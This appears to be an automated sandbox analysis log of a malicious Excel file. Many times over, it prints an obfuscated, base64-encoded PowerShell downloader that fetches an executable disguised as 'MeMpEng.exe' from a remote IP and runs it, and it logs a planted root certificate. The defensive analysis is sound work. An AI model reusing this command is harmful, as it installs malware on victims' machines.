    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_729F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,11_2_729F1BFF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898A022D push eax; iretd 7_2_000007FE898A0241
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898A00BD pushad ; iretd 7_2_000007FE898A00C1
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_729F30C0 push eax; ret 11_2_729F30EE
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_6A2B30C0 push eax; ret 20_2_6A2B30EE

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsDialogs.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exeJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\LangDLL.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MeMpEng.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsDialogs.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
